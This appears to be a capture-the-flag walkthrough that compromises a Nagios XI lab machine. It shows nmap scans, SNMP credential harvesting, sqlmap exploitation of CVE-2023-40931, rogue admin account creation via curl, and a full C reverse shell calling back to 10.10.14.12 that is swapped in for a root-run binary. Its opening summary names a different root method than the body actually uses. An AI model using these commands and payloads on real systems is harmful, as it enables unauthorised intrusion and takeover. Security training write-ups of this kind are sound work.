Monitored - Walkthrough
Monitored is a medium-difficulty Linux machine that features a Nagios instance. Credentials for the service are obtained via the SNMP protocol, which reveals a username and password combination provided as command-line parameters. Using the Nagios API, an authentication token for a disabled account is obtained, which leads to access to the application's dashboard. From there, a SQL injection CVE-2023-40931 is abused to obtain an administrator API key, with which a new admin account is created and used to run arbitrary commands on the instance, leading to a reverse shell. Finally, sudo access to a bash script is abused to read the root user's SSH key and authenticate as root.
Reconnaissance
We begin with an Nmap scan to identify open services:
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.248 -oG allPortsThe scan reveals:
| PORT | STATE | SERVICE |
|---|---|---|
| 22/tcp | open | ssh |
| 80/tcp | open | http |
| 389/tcp | open | ldap |
| 443/tcp | open | https |
| 5667/tcp | open | unknown |
A targeted scan provides more details:
sudo nmap -p22,80,389,443,5667 -sCV 10.10.11.248 -oN targeted- SSH → OpenSSH 8.4p1 Debian 5+deb11u3
- HTTP → Apache 2.4.56, redirecting to
https://nagios.monitored.htb/ - HTTPS → Nagios XI
- LDAP → OpenLDAP 2.2.X - 2.3.X
We add the hostname to /etc/hosts:
sudo sh -c 'echo "10.10.11.248 nagios.monitored.htb" >> /etc/hosts'
A UDP scan reveals SNMP:
sudo nmap -p- -sUCV --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.248 -oG allPortsUdp- 161/udp → SNMPv1 server
Enumeration
We query SNMP for information:
snmpbulkwalk -v 2c -c public -O a nagios.monitored.htb >> snmpwalk.txtThe output reveals credentials:
iso.3.6.1.2.1.25.4.2.1.5.1417 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"| Username | Password |
|---|---|
| svc | XjH7VCehowpR1xZB |
Using the Nagios API, we authenticate and obtain a token:
curl -sikX 'POST' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary 'username=svc&password=XjH7VCehowpR1xZB' 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate'The response includes a valid auth token:
{
"username": "svc",
"user_id": "2",
"auth_token": "2e52f0f988b54ef4b63f6a46a5a1275f5efa8a0b",
"valid_min": 5,
"valid_until": "Sat, 06 Apr 2024 05:38:50 -0400"
}We can now access the Nagios XI dashboard:
https://nagios.monitored.htb/nagiosxi/login.php?token=2e52f0f988b54ef4b63f6a46a5a1275f5efa8a0b
Exploitation
We identify a SQL injection vulnerability (CVE-2023-40931) in the banner message endpoint:
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3" --batch -p id --cookie="nagiosxi=dp2nabacj7kq9l359uj4ledbho" --dbms=mysql --threads=10We extract user credentials from the database:
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3" --batch -p id --cookie="nagiosxi=dp2nabacj7kq9l359uj4ledbho" --dbms=mysql --threads=10 -D nagiosxi -T xi_users --dump| Username | API Key |
|---|---|
| nagiosadmin | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL |
| svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK |
Using the admin API key, we create a new admin user:
curl -sikX POST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" -H 'Content-Type: application/x-www-form-urlencoded' --data-binary 'username=johndoe&[email protected]&name=JohnDoe&password=12345&auth_level=admin'We can now execute commands through the Nagios command execution feature. We set up a listener and execute a reverse shell:
nc -lvnp 5000We obtain a shell as the nagios user and capture the user flag:
cat user.txtUser flag: 0d8bb94199fb26a55d80ac440f77554d
Privilege Escalation
We check sudo privileges:
sudo -lThe user can run several scripts as root, including /usr/local/nagiosxi/scripts/manage_services.sh.
Using linpeas, we identify writable Nagios binaries:
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagiosWe replace the nagios binary with a reverse shell:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 6000;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.10.14.12");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"bash", NULL};
execvp("bash", argv);
return 0;
}nagios@monitored:/usr/local/nagios/bin$ gcc -o nagios nagios.c
nagios@monitored:/usr/local/nagios/bin$ chmod +x nagios
nagios@monitored:/usr/local/nagios/bin$ sudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagiosWe catch the root shell:
nc -lvnp 6000cat /root/root.txtRoot flag: f372d917122ffefda9fb77c779fe2117